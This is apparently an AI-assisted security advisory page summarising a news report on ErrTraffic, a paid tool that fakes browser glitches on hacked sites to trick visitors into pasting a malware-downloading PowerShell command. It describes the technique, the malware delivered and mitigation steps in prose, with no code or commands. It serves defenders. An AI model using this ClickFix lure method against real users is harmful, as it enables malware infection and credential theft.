top of page
perceptive_background_267k.jpg

New ErrTraffic service enables ClickFix attacks via fake browser glitches

Published:

30 december 2025 om 21:08:28

Alert date:

30 december 2025 om 22:02:15

Source:

bleepingcomputer.com

Click to open the original link from this advisory

Web Technologies, Ransomware & Malware, Data Breach & Exfiltration

A new cybercrime-as-a-service tool called ErrTraffic has emerged, enabling threat actors to automate ClickFix attacks. The service generates fake browser glitches on compromised websites to deceive users into downloading malicious payloads or following harmful instructions. This represents an evolution in social engineering attacks, making them more accessible to cybercriminals through automation. The tool poses significant risks as it can be used to distribute malware, steal credentials, or compromise systems through user deception. The service demonstrates the continued professionalization of cybercrime operations.

Technical details

ErrTraffic is a self-hosted traffic distribution system (TDS) that automates ClickFix attacks by generating fake browser glitches on compromised websites. The platform costs $800 for a one-time purchase and claims conversion rates up to 60%. It uses geolocation and OS fingerprinting to modify page DOM and display visual glitches like corrupted text, font replacement with symbols, fake Chrome updates, or missing system font errors. When victims follow instructions to 'fix' the glitch, JavaScript code adds a PowerShell command to clipboard that downloads malware payloads. The platform delivers OS-specific malware: Lumma and Vidar info-stealers on Windows, Cerberus trojan on Android, AMOS (Atomic Stealer) on macOS, and Linux backdoors. It excludes CIS countries from targeting, suggesting Russian origins.

Mitigation steps:

Monitor for suspicious website behavior including corrupted text displays, fake browser update prompts, missing font error messages, and unexpected clipboard modifications. Be cautious of websites that suddenly appear broken or display technical error messages requesting you to run commands or download updates. Implement security controls to detect PowerShell command execution from clipboard content and monitor for connections to known malware distribution sites.

Affected products:

Windows
Android
macOS
Linux
Google Chrome
Web browsers

Related links:

https://www.bleepingcomputer.com/news/security/fake-google-chrome-errors-trick-you-into-running-malicious-powershell-scripts/
https://www.bleepingcomputer.com/news/security/state-sponsored-hackers-embrace-clickfix-social-engineering-tactic/
https://www.infostealers.com/article/the-industrialization-of-clickfix-inside-errtraffic/

Related CVE's:

Related threat actors:

IOC's:

This article was created with the assistance of AI technology by Perceptive.

About us

© 2025 by Perceptive Security. All rights reserved.

email: info@perceptivesecurity.com

Deze website toont informatie afkomstig van externe bronnen; Perceptive aanvaardt geen verantwoordelijkheid voor de juistheid, volledigheid of actualiteit van deze informatie.

bottom of page